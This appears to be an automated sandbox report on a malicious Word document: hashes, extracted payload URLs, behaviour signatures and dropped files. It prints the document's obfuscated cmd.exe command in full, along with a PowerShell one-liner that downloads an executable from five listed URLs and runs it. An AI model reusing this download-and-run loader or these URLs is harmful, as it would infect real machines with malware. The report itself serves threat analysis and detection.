Analysis
-
max time kernel
101s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
21-09-2024 05:39
General
-
Target
ef295715e6f9c3676ae1ebbf3d7f808a_JaffaCakes118.doc
-
Size
129KB
-
MD5
ef295715e6f9c3676ae1ebbf3d7f808a
-
SHA1
0b72d9d8377a2aec8b3d9001df4eee51db4118e2
-
SHA256
3c85c228036f9b6319888cf84bc9f42964b58885746d0a9ef305c36c933da2c3
-
SHA512
492f756507d1ec65e3b9069d164a565cfaa9a6dfeb621030f56ec5f03fddfdd45ffa3d2192cc50919060e95bb2da1d56a8cb03a0eafa9e8fc12178aad69b61e5
-
SSDEEP
1536:pptJlmrJpmxlRw99NBN+aEzLK18JZyvPxdsmp6hcSnfPbQrUU6tN7C:Xte2dw99fqJyxdsKGXfTQrt6tx
Malware Config
Extracted
https://malehequities.com/wp-includes/widgets/Wta9fQ
http://komedhold.com/wp-content/EaW
http://austincondoliving.com/TnZNdohh
http://www.estelleappiah.com/wp-content/uploads/2OCShGJG
http://www.peruwalkingtravel.com/LI
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ef295715e6f9c3676ae1ebbf3d7f808a_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /V/C"^s^e^t ^2v^An=^9^]^z^ ^\^Y^k^ ^1^.^w^ ^|^=^y^ ^-^7^h ^[^3^K^ ^7^i^\ N^#^F ^P^`^_^ ^G^AC^ ^-^Mn^ ^#^z^H^ ^*^qR^ ^7^u^x^ ^BHC Q^j/^ ^5^I^K^ ^l^Q^e^}(^or^}^e^W^h^{C^}n^h^3^]/c^q^aV^t;^-^s^a^.n;cL^e^&^}T^-^'^;^d^G^[k^Eec^a^1^A^L^e^gS^[rc^a{^b^=^`N^;^}^B^?^G%^[N^J^i^{^7^M^.^`^s^$^3^W^h^ ^O^J^x^m^'^J^}^e^b^t(t^-^j^'^I^4^'^$^-^`^*^O^e^~(/^k^[^A^<^o(N^:v^?%^Bn^h^3^]IR^[8^;^=^ ^+)^0^l^P^G^\g^X^J^p^L^[^MN^K^M^$^p^6^s^ ^$R^q^,^L^:^U^m^,^9^7^f^Q%v^j^{^Qn^$^t^:^l(^-^*/^e^m'^6^l^0^+^Wi^u^2^>^F9^;^D^d^p^j^`^a^i^K^.^o^8^2;^l^J^.mn7^+^Y^w^`^G^D^o8^2^T^D^q^e/^.c^,^U^B^|^+^e^GR^=^i^On^yw^$L^a^=^{/^b%^yC^L^$r^_^S^UtN?^.^{s%/)vn^<r^l^L^>^M^[n^L^M^fro^$^b^#^U^ ^t^F^]n^[^g^I^i^2(\ ^3^>^p^m^G4^t^f^?R^B^j^w^|/^$^*r^l(^]^9^+^h^m%Rc%^<0^a^-^q%^e^f^#^hr^AV^&^o^P^xi^f^3^ ^1;^a^x%^'^B^5^=^e^X^m^[^x^bv^\^e^;^o^\^.^P^`^;^'^G^<^3^+^3^]%^I%^m^W^T^T^b^_^i^m^{^5^$@^X^W^+^x^$^|^'^0^[^#^\^>^}r^'^Y}^9^+^?q^*c^u^G^AiH^t^'^l^ ^l^X^b^g^3N^u)^@^U^p^|^Y0^:^x^,(v^8^]vn^@^J^f^e^;^tv^$^j^l^9^=^\^#^?^G^+^,^h^J^L^s^e^M^L^=^U^$^W^1B^;^Q^7^[^')^e^|^9^@^|q1c^t^G^3a^m^Q^'^-8^<^ ^t^-^P^=^$^]^D^ ;V^K^I^x^:^h^T^Z^H^u^i^>%^{^$^5^@^h;^@%^T)^6^w/^'pD^?^@^70C^'^;^#^-(^+^.^J^t^*^Fc^i^4^a^?^l^Wf^Z^p?^o^$^S^F^1d^.^6^H^F^'^'^1^=^Ic^bV^L^8^W^4/^=^6^H^mn)^q^o^O^}^;c^M^|^:^.^T^ ^-^l^{^:^qe^2^J^_v^]^,^2^a^+^m^Qr^{^4C^t^J^F^I^g^_^G^jnc^B^'^i^-^j^3k^\^G^m^l^G^t^+^a^9^e^2^wc^b^U^u^<^W^Or^i^O^S^eJe^O^p^T(d^.^Yr*^w^&^}^k^w^G^@^x^w^X^y^9/^O^*(/^s^~^l^:)^*^g^p%^=^\^t^.^2^Y^t^s^85^hC^.^-^@^2^oV^Gj^+^5^J)^I^0^G^~^o^?^h^K^k^J^S^.^`RC^`^>R^O)^4^L^2,^7^S/^_c^Ts^e^#8^d^P^X^w^a^h5^D^o^}^{^_^l^_^3^y^p^*^,^x^u=^1^D/^o^U^~^t^[^K^{n^p^[^x^e^>^jP^t^O^Z*n^g^5^{^o^`^T^=c^G^q^e^-^Ov^Lp^DU^9^w^Z^oJ/^y^J^6^mp^{^>^o^Gv^Jc^L^D^s^.)^:^u^h^?^-^~^a^X^-^?^i^+^7^;^p^H/W^p^Z^k^$^a^M^5^\^e^~V^X^l^]^&g^lk^eVeC^u^H^t^F^3^6^s^K^40^e^*^a^P^.^6V^[^w^p^|^P^w^q^j^P^w%^P//^@dV/^p^2^ ^:^`^.^ ^p^i^m^L^t^0v^i^tnW/^h#^T^E^@^H^#^+^hg^i0^h^:c^E^o^J^q^~^d^E^]^yN^-^s^>^ZR^s^an^-^a^K^T^Y^mc/^S^p^l^mkA^7^o^t^k^ic^,^9^$^.^?^q^7^g^i^a^kn^9^`^a^i^F^x^`v^+^`^-^i^@^drl^i^-^<^o^\^-^Q^d^Y^A^xn^@^Zw^o^l^]^}c^-^.Znvj^1^i^m^Y^[^t^t^`^&^s^_N^y^u%a^T^au^Q^Z/^S^0^</^I^[^a^:^Q^ae^p^@^Q^+^tr^}^i^t^Y^8^{^h^3^s^-^@^;^0^$^WVR^Ya^O^H^g^E^BX^}/^>^;\^tb^J/n^w^X^t^e^@^b^4^t^T^y^Zn^&^q^>^o^MD^dc%^<^Y^-)^~^4^p^0^+^8^w^1^YK/^[^Jc^mn^7c^o^a^7^Qc^TR^=^.v^$^&^d^]^@^\^l^G^?^{^o^2^w^T^hP^t^3^d^+^i^de^X^x^1^m^t^&^#^o^l^u^]^k^~^:^}/^Y^l^F/^j^9^u^:^H^s6^p^ol^]^t^Yr^j^t^?^i^j^h^l^QN^@^$)cQ^o^zr^f(^U^5^9^j^}^a^a^{^T^gtW3;^W^L^K^s/^i^F^\s^8^ p^tv^F^o^e^p^O^x^g^T^X^A^dN^u^X^i^7/^,^w^}c^:/^ ^T^ts^Y^sre^*^{W^dR^Z^_^u^h^3^e^l^b^$^Bc^w(^En^f^J^p^i^&^{y^-^4^$^g^p^T^p)^w^I/^3/^l_^\mv^F^Lo^|^@^;c^_^a^+.^2^[^J^s^5^X^I^e^F^z^,^iA^W^<^t^g^_^=^i^;^7^H^u^O)F^q^q1^.^e^Q^S-^hN^Y^D^e^l^A^|^l^p^@^sa^.^:(^m^Z^A^M//^m^?/^j^G^Y^:^O^-^0^sc^o^Y^pr(^`^t^x^ ^D^t/v^l^hN^H^[^'^6^5^|^=^_}^Jr^3^a^&^M^ ^S^8^M^#^~^Y^$^|^g^f^;^{^[^>^t^\)^>n^G^|^+^e^:^xN^icQ^+^l^WN^ZC^bcv^b{^X^&^e^>^H^J^W%^Z^-.^}9^d^t^m^Z^Mep^6rN^z^XH^ ^F^A^'^tr^?^Dc^j^#^K^e^H^~^T^j^y^m^4^b^}^DV^o^8^p^i^-^Z^;^'^wU^b^d^e^]^~^In^]^:)^=^g^U^H^BNc^B^G^8^@^h^O^,%l^$^t^ ^e^ ^B^>^`^l^S^[^h^l^J6^h^e^`^$u^h^GV^<s^A^x^Gr^>^9$^e/^*(^w^'^]^4^o),^M^p&&^f^or /^L %^b ^in (^17^1^9,^-^4^,^3)^d^o ^s^e^t ^3^2=!^3^2!!^2v^An:~%^b,1!&&^i^f %^b ^e^q^u ^3 ca^l^l %^3^2:~^-^4^3^0%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $OGB=new-object Net.WebClient;$MMr='https://malehequities.com/wp-includes/widgets/Wta9fQ@http://komedhold.com/wp-content/EaW@http://austincondoliving.com/TnZNdohh@http://www.estelleappiah.com/wp-content/uploads/2OCShGJG@http://www.peruwalkingtravel.com/LI'.Split('@');$iTI = '319';$MJG=$env:public+'\'+$iTI+'.exe';foreach($jfm in $MMr){try{$OGB.DownloadFile($jfm, $MJG);Invoke-Item $MJG;break;}catch{}}3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD5ce47f2cc0fca39f19e20bcf24f054bfd
SHA137d63be41b3e47b2903e82c5a31db2a0bbab4968
SHA256538d8c7b791ee469373267e1f1863f364fd64b2061975b7f5715f72576b15498
SHA512ade2cddd1614cb1e3ebc018a3ae09f815717eb4f7af3f139f1867fd0e28e394b7ed3e182cf57bd97151868649059a7c4af419f8637aa8132ce285aa2131382e2
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB